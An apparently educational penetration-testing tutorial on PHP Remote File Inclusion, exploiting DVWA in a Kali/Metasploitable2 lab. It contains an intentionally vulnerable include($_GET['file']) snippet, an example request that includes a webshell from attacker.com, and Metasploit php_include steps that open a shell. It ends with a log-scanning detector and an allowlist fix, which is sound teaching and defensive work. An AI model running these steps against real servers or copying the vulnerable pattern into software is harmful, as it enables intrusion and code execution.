From RFI(Remote File Inclusion) to Meterpreter Shell

For many years now we've participated in many coding forums and discussion platforms. Perhaps one of the biggest issues we see is people using $_GET or another unfiltered variable inside an include, include_once, require or require_once statement, which is a major security risk.

One of the most dangerous types of vulnerabilities we can find while penetration testing is Remote File Inclusion (RFI). RFI gives us the ability to execute code on the Web server in the context of the user running the Web server. With this, we can generate shells, include other code, and, through post-exploitation, potentially elevate privileges. This type of exploit frequently leads to the compromise of other resources, as the Web server is then leveraged to attack other hosts.

Let’s look more closely at what RFI is, how it happens, and how we can make a vulnerable application bend to our will.

Remote file inclusion attacks happen when an attacker pulls files from a remote location onto your server. When you use remote includes, an attacker can write a PHP script, host it on a server they control, and then use the remote include mechanism to exploit inclusion vulnerabilities on your server.

With an insecure PHP configuration, attackers can execute the malicious code from their own servers, even without read or write permissions on your server.

In PHP applications, there are typically two problems that lead to RFI vulnerabilities. The first is a logic error in the application. Usually, these vulnerabilities are due to files that are expected to be included as part of another page that includes other files. When these files are executed independently, there is no configuration file to specify the default values for those variables, and if the Web server is configured improperly, the user may be able to specify them as part of the request.

Example: a PHP program that is vulnerable to Remote File Inclusion (RFI)

<?php
// Vulnerable on purpose: the "file" parameter comes straight from the request
// and is handed to include() without any validation.
$file = $_GET['file'];
include($file);
?>

In the above code, the "file" parameter is taken from the request, so it is a user-supplied value. The code takes the "file" value and passes it directly to include, so an attacker can craft a request that tricks the application into executing a malicious script, for example a webshell, like this: http://example.com/?file=http://attacker.com/shell.php.

Exploiting RFI requires that you have a PHP shell uploaded somewhere and accessible from the internet. In this article, we will be exploiting an RFI vulnerability to get a command shell on the target system, i.e. on the Metasploitable2 machine.

Back on the attacker machine, i.e. Kali Linux, whose IP address is 192.168.73.128 (in our case), create a test PHP file (e.g. yeahhub.php) under the /var/www/html directory and restart the Apache server as shown below.

To check whether an RFI vulnerability exists, we can simply ask the web application in question to retrieve the file we created in the step above.

Go to the "File Inclusion" page in DVWA, and replace the page being requested with the path of our test file, i.e. yeahhub.php, hosted on the Kali machine (http://192.168.73.128/yeahhub.php).

When the page loads, we can see the text (YEAHHUB.COM is Here) from our PHP file, indicating that this page is indeed vulnerable to RFI.
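The test request above leaves a clear trace on the target's side. The following is an added example, not code from the original article: a small scanner over constructed Apache access-log lines that flags any query parameter whose value is a full URL, including the percent-encoded form.

```php
<?php
// Added example, not from the article: what the RFI probe above looks like in the
// web server's access log, and a small scanner that flags query parameters whose
// value is a full URL. The three log lines are constructed for this example.

$sampleLog = <<<'LOG'
192.168.73.128 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.73.128 - - [10/Oct/2023:12:00:07 +0000] "GET /index.php?file=http://192.168.73.128/yeahhub.php HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
192.168.73.128 - - [10/Oct/2023:12:00:09 +0000] "GET /index.php?file=http%3A%2F%2F192.168.73.128%2Fyeahhub.php HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
LOG;

/**
 * Return one record per request whose query string carries a parameter
 * that starts with a URL scheme (http://, https://, ftp://, ...).
 * Values are URL-decoded first, so percent-encoded probes are caught too.
 */
function find_remote_include_requests(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Apache combined format: client IP, timestamp, then the quoted request line.
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $ts, $target] = $m;
        $parts = explode('?', $target, 2);
        if (count($parts) < 2) {
            continue;                        // no query string at all
        }
        parse_str($parts[1], $params);       // parse_str also percent-decodes values
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
                $hits[] = ['ip' => $ip, 'time' => $ts, 'param' => $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

foreach (find_remote_include_requests($sampleLog) as $h) {
    printf("%s  %s  %s=%s\n", $h['time'], $h['ip'], $h['param'], $h['value']);
}
```

Run against the sample, it reports the second and third lines (the plain and the percent-encoded remote URL) and ignores the first.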

[#2] Exploitation with Metasploit Framework –

Before starting the exploitation process, make sure to note down all the cookie values, i.e. PHPSESSID and the security value, so that we can pass them to the Metasploit module.

In this case, the PHPSESSID value is bb68ea00e0a624f159c5ea12ad0a1176 and security value is low.

Metasploit has the ability to exploit RFI vulnerabilities as well, and with Metasploit we get the power of the Metasploit payloads. The PHP Meterpreter shell will allow us to route traffic, execute shell commands, and execute Meterpreter scripts under the context of the Web server.

To use the php_include exploit module, we launch msfconsole and type "use exploit/unix/webapp/php_include".

The php_include module is very versatile: it can be used against any number of vulnerable web apps and is not product-specific. To make use of the file inclusion exploit module, we need to know the exact path to the vulnerable site; you can see all the required options by typing the "show options" command.

The most critical option to set in this module is the exact path to the vulnerable inclusion point. Where we would normally provide the URL to our PHP shell, we simply place the text XXpathXX, and Metasploit will know to attack that point on the site.

To further show off the versatility of Metasploit, we will use the PHP Meterpreter payload; to see all available payloads, the command is "show payloads".

To set the PHP payload, the command is "set payload php/bind_php".

Type run to launch the exploit, which immediately opens a shell session in which you can execute any number of Unix commands, as shown below:

[#3] Prevention of RFI –

To prevent exploitation of remote file inclusion vulnerabilities, you should always disable the remote inclusion feature in your programming language's configuration, especially if you do not need it.

Along with that, set the value of allow_url_include to 0. You should also validate user input before you pass it to an inclusion function.
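Here is an added example, not the article's own code, of what both recommendations look like in practice: the php.ini setting in a comment, and the vulnerable include($_GET['file']) from earlier rewritten so that the request value is only ever used as a key into an allowlist (the page names and directory are hypothetical).

```php
<?php
// Added example, not the article's own code: the include($_GET['file']) pattern
// above, rewritten so that user input is never passed to include() directly.
//
// Server-side setting the article recommends (php.ini or php-fpm pool config):
//   allow_url_include = 0   ; include/require can no longer fetch http:// etc.
//   allow_url_fopen   = 0   ; optional: also blocks remote reads via fopen()

// Allowlist: request keys on the left, real files on the right (names are hypothetical).
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Every includable page lives under this directory.
define('PAGE_DIR', __DIR__ . '/pages');

/**
 * Map a user-supplied key to a file path, or return null.
 * The key is looked up, never concatenated, so a value such as
 * http://attacker.com/shell.php can never reach include().
 */
function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    // Second check: the resolved file must still sit inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$key  = $_GET['file'] ?? 'home';
$path = resolve_page($key);
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

The allowlist is the primary control; allow_url_include = 0 is defence in depth so that a future include() elsewhere in the code base cannot fetch remote content either.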
